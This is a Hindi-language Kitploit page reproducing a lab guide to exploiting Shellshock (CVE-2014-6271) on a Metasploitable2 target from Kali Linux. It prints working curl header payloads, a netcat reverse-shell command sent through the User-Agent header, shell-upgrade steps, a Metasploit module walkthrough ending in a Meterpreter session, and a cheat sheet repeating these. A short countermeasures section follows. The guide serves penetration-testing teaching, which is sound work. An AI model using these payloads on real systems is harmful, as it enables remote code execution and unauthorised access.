Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-6271-Shellshock- — CVE-2014-6271 (Shellshock) के लिए एक पूर्ण, आधुनिक प्रदर्शन लैब, जिसमें आर्किटेक्चर, शोषण चरण, Burp Suite उपयोग, रिवर्स शेल, प्रतिवाद और पूर्ण कमांड चीट-शीट शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
भेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
पेलोड डेवलपमेंट
लैब और अभ्यास
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

CVE-2014-6271 (Shellshock) के लिए एक पूर्ण, आधुनिक प्रदर्शन लैब, जिसमें आर्किटेक्चर, शोषण चरण, Burp Suite उपयोग, रिवर्स शेल, प्रतिवाद और पूर्ण कमांड चीट-शीट शामिल हैं।

रिपॉजिटरी देखें
49 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शेलशॉक (CVE-2014-6271) का शोषण: एक पूर्ण, आधुनिक प्रदर्शन प्रयोगशाला

शेलशॉक (CVE-2014-6271) अब तक खोजी गई सबसे प्रभावशाली रिमोट कोड निष्पादन कमजोरियों में से एक है। यह दोष Bash को प्रभावित करता है और हमलावरों को पर्यावरण चरों में तैयार पेलोड इंजेक्ट करके मनमाने आदेशों को निष्पादित करने की अनुमति देता है।

यह मार्गदर्शिका निम्नलिखित का उपयोग करके एक पूर्ण, प्रतिलिपि प्रस्तुत करने योग्य प्रदर्शन प्रदान करती है:

  • काली लिनक्स (हमलावर)
  • मेटास्प्लोइटेबल2 (लक्ष्य)
  • curl, Burp Suite, Netcat
  • मैन्युअल रूप से बनाई गई Bash-आधारित CGI स्क्रिप्ट

यह शिक्षण, अनुसंधान, प्रशिक्षण और सामान्य साइबर सुरक्षा जागरूकता के लिए डिज़ाइन किया गया है।


📌 विषय-सूची

  1. प्रयोगशाला वास्तुकला
  2. संवेदनशील CGI स्क्रिप्ट बनाना
  3. शेलशॉक कमजोरी को समझना
  4. curl के साथ शेलशॉक का शोषण
  5. Burp Suite के साथ शेलशॉक का शोषण
  6. शेलशॉक के माध्यम से रिवर्स शेल
  7. पूर्णतः इंटरैक्टिव TTY में अपग्रेड करना
  8. हमला श्रृंखला आरेख
  9. स्क्रीनशॉट गैलरी
  10. प्रतिउपाय
  11. चीट शीट (सभी कमांड)
  12. Metasploit का उपयोग करके शेलशॉक का शोषण
  • निष्कर्ष

  • 1. प्रयोगशाला वास्तुकला

    घटकभूमिकाOSआईपी पतामुख्य सेवाएँ
    काली लिनक्सहमलावरKali Linux (नवीनतम)192.168.1.4curl, Burp Suite, Netcat
    मेटास्प्लोइटेबल2लक्ष्य संवेदनशील सर्वरUbuntu Linux (MSF2)192.168.1.5Apache 2.2, CGI स्क्रिप्ट्स, Bash
    Apache mod_cgiस्क्रिप्ट निष्पादनMSF2 पर चलता हैn/aCGI के माध्यम से Bash को उजागर करता है
    shellshock.shसंवेदनशील प्रवेश बिंदुBash CGIn/aपर्यावरण चर प्रदर्शित करता है

    यह सरल दो-नोड सेटअप औद्योगिक और IoT सिस्टम में अभी भी मौजूद कई विरासत परिनियोजनों को दर्शाता है।


    2. संवेदनशील CGI स्क्रिप्ट बनाना

    Metasploitable2 पर:

    root@kitploit:~
    sudo su
    cd /usr/lib/cgi-bin/
    
    cat << 'EOF' > shellshock.sh
    #!/bin/bash
    echo "Content-type: text/html"
    echo
    echo "<pre>"
    env
    echo "</pre>"
    EOF
    
    chmod +x shellshock.sh
    a2enmod cgi
    service apache2 restart
    

    Kali से स्क्रिप्ट का परीक्षण करें:

    root@kitploit:~
    curl http://192.168.1.5/cgi-bin/shellshock.sh
    

    आपको पर्यावरण चर प्रदर्शित होते हुए देखना चाहिए।


    3. शेलशॉक कमजोरी को समझना

    शेलशॉक तब होता है जब Bash फ़ंक्शन परिभाषाओं से मिलते-जुलते पर्यावरण चरों का गलत तरीके से पार्स करता है।

    एक दुर्भावनापूर्ण चर जैसे:

    root@kitploit:~
    () { :; }; /bin/bash -c "id"
    

    Bash को फ़ंक्शन परिभाषा के बाद कमांड निष्पादित करने का कारण बनेगा—भले ही फ़ंक्शन स्वयं कभी आह्वान न किया गया हो।

    CGI अनुप्रयोग विशेष रूप से संवेदनशील होते हैं क्योंकि HTTP हेडर स्वचालित रूप से पर्यावरण चर के रूप में स्क्रिप्ट को पास हो जाते हैं।


    4. curl के साथ शेलशॉक का शोषण

    root@kitploit:~
    curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
    http://192.168.1.5/cgi-bin/shellshock.sh
    

    आउटपुट में शामिल होना चाहिए:

    root@kitploit:~
    Vulnerable
    uid=33(www-data)
    

    यह रिमोट कोड निष्पादन की पुष्टि करता है।


    5. Burp Suite के साथ शेलशॉक का शोषण

    5.1 सामान्य अनुरोध भेजें

    यहाँ जाएँ:

    root@kitploit:~
    http://192.168.1.5/cgi-bin/shellshock.sh
    

    अनुरोध को Repeater पर भेजें।

    5.2 शेलशॉक पेलोड इंजेक्ट करें

    User-Agent हेडर को इससे बदलें:

    root@kitploit:~
    User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"
    

    5.3 प्रतिक्रिया

    आपको देखना चाहिए:

    root@kitploit:~
    BurpTest
    uid=33(www-data)
    

    Burp Suite दृश्य और शैक्षिक तरीके से कमजोरी की पुष्टि करता है।


    6. शेलशॉक के माध्यम से रिवर्स शेल

    Kali पर सुनने वाला प्रारंभ करें:

    root@kitploit:~
    nc -lvnp 4444
    

    CGI स्क्रिप्ट के माध्यम से रिवर्स शेल ट्रिगर करें:

    root@kitploit:~
    curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
    http://192.168.1.5/cgi-bin/shellshock.sh
    

    Kali को एक शेल वापस जुड़ जाएगा।


    7. पूर्णतः इंटरैक्टिव TTY में अपग्रेड करना

    रिवर्स शेल के अंदर:

    root@kitploit:~
    python -c 'import pty; pty.spawn("/bin/bash")'
    export TERM=xterm
    

    सत्र को निलंबित करें:

    root@kitploit:~
    Ctrl + Z
    

    Kali पर:

    root@kitploit:~
    stty raw -echo; fg
    

    Enter दबाएँ।

    अब आपके पास है:

    • टैब पूर्णता
    • तीर कुंजियाँ
    • जॉब नियंत्रण
    • पूर्ण इंटरैक्टिव Bash

    8. हमला श्रृंखला आरेख

    root@kitploit:~
              ┌────────────────────────┐
              │     हमलावर (काली)      │
              │      192.168.1.4       │
              └───────────┬────────────┘
                          │
         1. दुर्भावनापूर्ण HTTP हेडर (शेलशॉक)
                          │
                          ▼
            ┌──────────────────────────┐
            │ Apache वेब सर्वर (CGI)   │
            │     192.168.1.5          │
            └───────────┬──────────────┘
                        │
       2. हेडर → CGI पर्यावरण चर
                        │
                        ▼
          ┌──────────────────────────┐
          │     Bash (संवेदनशील)     │
          └───────────┬──────────────┘
                      │
          3. इंजेक्टेड कमांड निष्पादित होता है
                      │
                      ▼
            ┌─────────────────────────┐
            │  www-data शेल एक्सेस    │
            └───────────┬─────────────┘
                        │
            4. रिवर्स शेल → काली
                        │
                        ▼
          ┌──────────────────────────┐
          │ पूर्ण इंटरैक्टिव TTY     │
          └──────────────────────────┘
    

    9. स्क्रीनशॉट गैलरी

    हमले के प्रमुख चरणों का एक दृश्य वॉकथ्रू।

    विवरणछवि
    Nmap स्कैन + Shellshock परीक्षण आउटपुट
    Burp Suite – प्रारंभिक Shellshock अनुरोध
    Burp Suite – पेलोड / हेडर इंजेक्शन
    Kali पर प्राप्त रिवर्स शेल (nc)

    10. प्रतिउपाय

    ✔ 1. Bash को अपग्रेड करें

    उस संस्करण पर पैच लागू करें जो फ़ंक्शन पार्सिंग को सही ढंग से संभालता है।

    ✔ 2. CGI को अक्षम करें

    विरासत CGI अनावश्यक प्रणालीगत जोखिम का परिचय देता है।

    ✔ 3. HTTP हेडर को स्वच्छ करें

    संदिग्ध पैटर्न जैसे कि:

    root@kitploit:~
    () { :; };
    

    को हटाएँ।

    ✔ 4. न्यूनतम विशेषाधिकार का उपयोग करें

    वेब सर्वर उपयोगकर्ता (www-data) की अनुमतियों को प्रतिबंधित करें।

    ✔ 5. आउटबाउंड कनेक्शन प्रतिबंध

    रिवर्स शेल और डेटा निष्कासन को रोकता है।

    ✔ 6. वेब एप्लिकेशन फ़ायरवॉल (WAF) तैनात करें

    आधुनिक WAF हस्ताक्षर शेलशॉक का तुरंत पता लगाते हैं।

    ✔ 7. SELinux / AppArmor सक्षम करें

    Bash प्रक्रियाओं को सीमित करता है और अनावश्यक व्यवहार को अवरुद्ध करता है।

    ✔ 8. नियमित कमजोरी स्कैन चलाएँ

    निम्नलिखित टूल का उपयोग करें:

    • Nessus
    • OpenVAS
    • Nikto
    • Nmap NSE (http-shellshock.nse)

    11. चीट शीट (सभी कमांड)

    लक्ष्य सेटअप

    root@kitploit:~
    sudo su
    cd /usr/lib/cgi-bin/
    cat << 'EOF' > shellshock.sh
    #!/bin/bash
    echo "Content-type: text/html"
    echo
    echo "<pre>"
    env
    echo "</pre>"
    EOF
    chmod +x shellshock.sh
    a2enmod cgi
    service apache2 restart
    

    CGI का परीक्षण

    root@kitploit:~
    curl http://192.168.1.5/cgi-bin/shellshock.sh
    

    शेलशॉक परीक्षण

    root@kitploit:~
    curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
    http://192.168.1.5/cgi-bin/shellshock.sh
    

    रिवर्स शेल

    root@kitploit:~
    nc -lvnp 4444
    
    root@kitploit:~
    curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
    http://192.168.1.5/cgi-bin/shellshock.sh
    

    पूर्ण TTY में अपग्रेड

    शेल के अंदर:

    root@kitploit:~
    python -c 'import pty; pty.spawn("/bin/bash")'
    export TERM=xterm
    

    निलंबित करें:

    root@kitploit:~
    Ctrl + Z
    

    Kali पर:

    root@kitploit:~
    stty raw -echo; fg
    

    Enter दबाएँ।


    12. Metasploit (msfconsole) का उपयोग करके शेलशॉक का शोषण

    Metasploit अंतर्निहित मॉड्यूल का उपयोग करके शेलशॉक का शोषण करने का एक पेशेवर, स्वचालित तरीका प्रदान करता है:

    root@kitploit:~
    exploit/multi/http/apache_mod_cgi_bash_env_exec
    

    यह विधि तेज़, विश्वसनीय है और स्वचालित पेलोड स्टेजिंग (जैसे, Meterpreter) प्रदान करती है।


    12.1 Metasploit प्रारंभ करें

    root@kitploit:~
    msfconsole
    

    12.2 शेलशॉक मॉड्यूल खोजें

    root@kitploit:~
    search shellshock
    

    आपको (अन्य के साथ) देखना चाहिए:

    root@kitploit:~
    exploit/multi/http/apache_mod_cgi_bash_env_exec  Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
    auxiliary/scanner/http/apache_mod_cgi_bash_env   Apache mod_cgi Bash Environment Variable Injection (Scanner)
    

    12.3 एक्सप्लॉइट मॉड्यूल लोड करें

    root@kitploit:~
    use exploit/multi/http/apache_mod_cgi_bash_env_exec
    

    12.4 आवश्यक विकल्प कॉन्फ़िगर करें

    लक्ष्य IP सेट करें:

    root@kitploit:~
    set rhosts 192.168.1.5
    

    संवेदनशील CGI पथ सेट करें:

    root@kitploit:~
    set targeturi /cgi-bin/shellshock.sh
    

    अपना Kali IP सेट करें:

    root@kitploit:~
    set lhost 192.168.1.4
    

    वैकल्पिक रूप से सुनने का पोर्ट सेट करें:

    root@kitploit:~
    set lport 4444
    

    सत्यापित करें:

    root@kitploit:~
    options
    

    आपको देखना चाहिए:

    root@kitploit:~
    RHOSTS     192.168.1.5
    TARGETURI  /cgi-bin/shellshock.sh
    LHOST      192.168.1.4
    LPORT      4444
    METHOD     GET
    HEADER     User-Agent
    CVE        CVE-2014-6271
    

    12.5 एक्सप्लॉइट लॉन्च करें

    root@kitploit:~
    run
    

    सफलता पर:

    root@kitploit:~
    [*] Started reverse TCP handler on 192.168.1.4:4444
    [*] Command Stager progress - 100.00%
    [*] Sending stage ...
    [*] Meterpreter session 1 opened ...
    

    12.6 Meterpreter सत्र के साथ इंटरैक्ट करें

    root@kitploit:~
    sessions -i 1
    

    अब आपके पास है:

    root@kitploit:~
    meterpreter >
    

    12.7 एक सामान्य शेल प्राप्त करें

    root@kitploit:~
    shell
    

    फिर:

    root@kitploit:~
    id
    hostname
    

    अपेक्षित:

    root@kitploit:~
    uid=33(www-data) gid=33(www-data)
    metasploitable
    

    आपने Metasploit और Shellshock का उपयोग करके रिमोट कमांड निष्पादन प्राप्त किया है।


    13. निष्कर्ष

    यह प्रदर्शन दर्शाता है कि कैसे शेलशॉक का शोषण सरल HTTP हेडर हेरफेर, रिवर्स शेल, CGI स्क्रिप्ट निष्पादन और Metasploit ऑटोमेशन का उपयोग करके किया जा सकता है। एक दशक से अधिक पुराना होने के बावजूद, शेलशॉक इनमें एक महत्वपूर्ण सबक बना हुआ है:

    • सुरक्षित सॉफ़्टवेयर प्रथाएँ
    • इनपुट स्वच्छता
    • विरासत सिस्टम जोखिम
    • पोस्ट-एक्सप्लॉइटेशन तकनीकें

    बहुत प्यार से बनाया गया:
    Haitham of Oman ❤️🇴🇲

    टूल डाउनलोड करें